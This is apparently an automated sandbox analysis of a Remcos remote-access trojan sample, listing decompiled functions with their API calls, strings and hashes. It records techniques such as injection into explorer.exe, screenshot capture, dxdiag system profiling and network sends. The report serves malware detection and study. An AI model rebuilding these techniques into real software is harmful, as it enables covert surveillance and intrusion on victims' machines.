                                                                                                                                                    • Instruction ID: 0fc8388f20f7886ec598920670f49626348cf8a38ec87be6254c38699ff8d3a3
                                                                                                                                                    • Opcode Fuzzy Hash: 02a5486addaa6b0ae84f2ee698835f8df9a087e3b3ca3e966815b6c00af8dc0c
                                                                                                                                                    • Instruction Fuzzy Hash: 85417475B132189ADB18E764DC94DFEB3B9BF50111F400169E406A71A4FF307E4ACAE8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFA058 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02DFA078
                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02DFA08F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02DFA095
                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DFA123
                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02DFA12F
                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 02DFA143
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 02DFA08A
                                                                                                                                                    • LoadLibraryExA, xrefs: 02DFA085
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                                                                    • Opcode ID: 5e29a96d5ef749d99cb97ccaa7e8e1292bb77bd252697d12b234f7daad166e99
                                                                                                                                                    • Instruction ID: 37e017bfb1afaf95dfef14d38ea58b244b5f8e63e7a78f7278ceeaa1d0b2f981
                                                                                                                                                    • Opcode Fuzzy Hash: 5e29a96d5ef749d99cb97ccaa7e8e1292bb77bd252697d12b234f7daad166e99
                                                                                                                                                    • Instruction Fuzzy Hash: 4D315EB5A40305BBEB60DF68DC81F5A77A8EF15364F064558EB19AB380D330ED40CBA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156BA83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA892
                                                                                                                                                    • GetLastError.KERNEL32(?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA89F
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 156BA8A6
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA8D2
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA8DC
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 156BA8E3
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,15681D55,?), ref: 156BA926
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA930
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 156BA937
                                                                                                                                                    • _free.LIBCMT ref: 156BA943
                                                                                                                                                    • _free.LIBCMT ref: 156BA94A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2441525078-0
                                                                                                                                                    • Opcode ID: 412d15293cb99d9904456a16457165d0d6c2f60ef9af85b3f3bd33d8b11ab887
                                                                                                                                                    • Instruction ID: e0787ec128e00dd08826c281c8a1154c2f9c00f929382d683eed2a9f32acd82b
                                                                                                                                                    • Opcode Fuzzy Hash: 412d15293cb99d9904456a16457165d0d6c2f60ef9af85b3f3bd33d8b11ab887
                                                                                                                                                    • Instruction Fuzzy Hash: E231C275A1924AAFCF11AFA8CC44DAE3B6DFF05272B110259F82056590DBB0ED11DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156854A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 156854BF
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1568556F
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1568557E
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 15685589
                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,156F4F78), ref: 15685641
                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 15685679
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                                                    • Opcode ID: db11657f331798b72d3c8ab0f53837c62fe50d109712001cc8c0ed38319f3813
                                                                                                                                                    • Instruction ID: 800f77a0e7e4a6f3b3da08817c333b2d4be4034fe19aa2bca5384f55ec5ab33f
                                                                                                                                                    • Opcode Fuzzy Hash: db11657f331798b72d3c8ab0f53837c62fe50d109712001cc8c0ed38319f3813
                                                                                                                                                    • Instruction Fuzzy Hash: C141E339B05315ABCB14EB34CCA886F37E9AF85610F40091DF95293694EF34B909CBD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C8121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156C8135
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156C8141
                                                                                                                                                    • _free.LIBCMT ref: 156C814C
                                                                                                                                                    • _free.LIBCMT ref: 156C8157
                                                                                                                                                    • _free.LIBCMT ref: 156C8162
                                                                                                                                                    • _free.LIBCMT ref: 156C816D
                                                                                                                                                    • _free.LIBCMT ref: 156C8178
                                                                                                                                                    • _free.LIBCMT ref: 156C8183
                                                                                                                                                    • _free.LIBCMT ref: 156C818E
                                                                                                                                                    • _free.LIBCMT ref: 156C819C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 6acc72e9867058ba1bc222e68c75ea4f2fe8022c8e38116a57891fb7f4dfe919
                                                                                                                                                    • Instruction ID: 652feb5b9a04c67109a8879f825b72aba92db432afd318253d7adf7b13eb0d47
                                                                                                                                                    • Opcode Fuzzy Hash: 6acc72e9867058ba1bc222e68c75ea4f2fe8022c8e38116a57891fb7f4dfe919
                                                                                                                                                    • Instruction Fuzzy Hash: 6F11A47E605108AFCB01DF58C840CD93BA5FF08255B4144A6BA589F632DA31FF50DBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02DE2849
                                                                                                                                                    • The unexpected small block leaks are:, xrefs: 02DE2707
                                                                                                                                                    • bytes: , xrefs: 02DE275D
                                                                                                                                                    • Unexpected Memory Leak, xrefs: 02DE28C0
                                                                                                                                                    • , xrefs: 02DE2814
                                                                                                                                                    • 7, xrefs: 02DE26A1
                                                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 02DE2690
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                    • API String ID: 0-2723507874
                                                                                                                                                    • Opcode ID: 01f2ecb52ca1f3573e3b87e8a640fd538c2055a07e584a8e3f81a3dd87e23670
                                                                                                                                                    • Instruction ID: 0f9fb0567390ad168c5b313b72f95d1cb0797a206b36665376235714d1158a62
                                                                                                                                                    • Opcode Fuzzy Hash: 01f2ecb52ca1f3573e3b87e8a640fd538c2055a07e584a8e3f81a3dd87e23670
                                                                                                                                                    • Instruction Fuzzy Hash: 9871B670A042988FDF21BA2CCC88B99B6F9EB09314F1441E5D94A97381DB754EC5CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15699FB4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15699FB9
                                                                                                                                                    • GdiplusStartup.GDIPLUS(156F4ACC,?,00000000), ref: 15699FEB
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 1569A077
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1569A0FD
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 1569A105
                                                                                                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 1569A1F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                    • API String ID: 489098229-3790400642
                                                                                                                                                    • Opcode ID: 2fe6075cd85fe534924bd62e9543c1c1fa01f2ee267b5a58aea83191fb993171
                                                                                                                                                    • Instruction ID: b8e57c0ec1dd5e74f344004daf0dcbccb28293c6fa91ca26a8456dfd317e23fe
                                                                                                                                                    • Opcode Fuzzy Hash: 2fe6075cd85fe534924bd62e9543c1c1fa01f2ee267b5a58aea83191fb993171
                                                                                                                                                    • Instruction Fuzzy Hash: D9518D74F02259DACF18EBB4CCA49EEBBB9AF55200F840019E545AB290EF74BD44C7E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D5F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,156D6FFF), ref: 156D5F27
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                    • Opcode ID: dd27ac71e4814b10120794a476950917c41d3ffabdff0e8800ffb012a84f7051
                                                                                                                                                    • Instruction ID: 22b6ba64a331049751bf82d9ba6a327849f04ee7e922e6780a40fcc127b08d78
                                                                                                                                                    • Opcode Fuzzy Hash: dd27ac71e4814b10120794a476950917c41d3ffabdff0e8800ffb012a84f7051
                                                                                                                                                    • Instruction Fuzzy Hash: EA513B7490571ECBCF00DF68EA845ACFB74FB49310F514A89D4C2ABA54CB329D24CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15697495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 156974F5
                                                                                                                                                      • Part of subcall function 1569C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 15697521
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 15697555
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                    • API String ID: 1462127192-2001430897
                                                                                                                                                    • Opcode ID: 8f635ac82967c7ea404761f374e67dd67ed07841740a869788d20c1ad9ec5144
                                                                                                                                                    • Instruction ID: 38288c6ad48b43337c5154248e8a561f23304d06f426b9a5dcc6dce39957adfc
                                                                                                                                                    • Opcode Fuzzy Hash: 8f635ac82967c7ea404761f374e67dd67ed07841740a869788d20c1ad9ec5144
                                                                                                                                                    • Instruction Fuzzy Hash: 9D316F79A122199ADF08EBA0DC94EFDB779AF10215F400159E406A7194EF307E8ACAD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156873AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(156F2B14,00000000,156F52D8,00003000,00000004,00000000,00000001), ref: 156873DD
                                                                                                                                                    • GetCurrentProcess.KERNEL32(156F2B14,00000000,00008000,?,00000000,00000001,00000000,15687656,C:\Users\user\Desktop\fu56fbrtn8.exe), ref: 1568749E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                    • API String ID: 2050909247-4242073005
                                                                                                                                                    • Opcode ID: 31a31340e3ab88ea61f53c6c2bc88d9432d30c730bb64d596d31d13f048d4e97
                                                                                                                                                    • Instruction ID: f5ce426a3487069958ad14a737cd4f6a94c7f4df74a0e4f0ef6f6e94dbe84eff
                                                                                                                                                    • Opcode Fuzzy Hash: 31a31340e3ab88ea61f53c6c2bc88d9432d30c730bb64d596d31d13f048d4e97
                                                                                                                                                    • Instruction Fuzzy Hash: 90318975A22314ABD321DF64DCB4F567BBCAB44215F00091AF91196600CF7AB810CFF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1569D476
                                                                                                                                                      • Part of subcall function 1569D50F: RegisterClassExA.USER32(00000030), ref: 1569D55B
                                                                                                                                                      • Part of subcall function 1569D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 1569D576
                                                                                                                                                      • Part of subcall function 1569D50F: GetLastError.KERNEL32 ref: 1569D580
                                                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1569D4AD
                                                                                                                                                    • lstrcpynA.KERNEL32(156F4B60,Remcos,00000080), ref: 1569D4C7
                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000000,156F4B48), ref: 1569D4DD
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1569D4E9
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 1569D4F3
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1569D500
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                    • String ID: Remcos
                                                                                                                                                    • API String ID: 1970332568-165870891
                                                                                                                                                    • Opcode ID: 6550cb04e31c7dd8474e235cc034448435f62dac8ade75d9553dd8ddf7658d28
                                                                                                                                                    • Instruction ID: 29fbb6a0d3964837061fc419208272d81b59991cc1cfabb9634670df809202c3
                                                                                                                                                    • Opcode Fuzzy Hash: 6550cb04e31c7dd8474e235cc034448435f62dac8ade75d9553dd8ddf7658d28
                                                                                                                                                    • Instruction Fuzzy Hash: A50139B181026CABDB109FA5CCACF9ABBBDFB81B16F01451EF95083481DB755045CBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CCD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1c2f9b3e32efaa2e18540134c58d5b49ad0b691ea3e6c352e25f50e82f64f190
                                                                                                                                                    • Instruction ID: 8157f5498078f65ff9803845bf821934b4060dc515dbe2d49b82baedd2af1b7a
                                                                                                                                                    • Opcode Fuzzy Hash: 1c2f9b3e32efaa2e18540134c58d5b49ad0b691ea3e6c352e25f50e82f64f190
                                                                                                                                                    • Instruction Fuzzy Hash: 51C18274E04289AFDB01CFA8C850BAD7BB5FF1A310F4441D9E965A7381C774A941CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D3D83 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,156D405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 156D3E2F
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3EB2
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 156D3EEA
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,156D405C,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3F45
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 156D3F94
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3F5C
                                                                                                                                                      • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3FD8
                                                                                                                                                    • __freea.LIBCMT ref: 156D4003
                                                                                                                                                    • __freea.LIBCMT ref: 156D400F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3256262068-0
                                                                                                                                                    • Opcode ID: 3d66bf9010c6092c290bb8216c33853f3067fc8273a07b3a6dc3262dab29def8
                                                                                                                                                    • Instruction ID: 345aeeb4e009e4113a47c184d5a36fda977b2a9f818745b42fd03f0630a64fd2
                                                                                                                                                    • Opcode Fuzzy Hash: 3d66bf9010c6092c290bb8216c33853f3067fc8273a07b3a6dc3262dab29def8
                                                                                                                                                    • Instruction Fuzzy Hash: F991A472F0435A9ADF108F65C880EDEFBB5AF49614F15496AE981E7680DB35EC40CBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C5179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 156C5423
                                                                                                                                                    • _free.LIBCMT ref: 156C5494
                                                                                                                                                    • _free.LIBCMT ref: 156C54AD
                                                                                                                                                    • _free.LIBCMT ref: 156C54DF
                                                                                                                                                    • _free.LIBCMT ref: 156C54E8
                                                                                                                                                    • _free.LIBCMT ref: 156C54F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
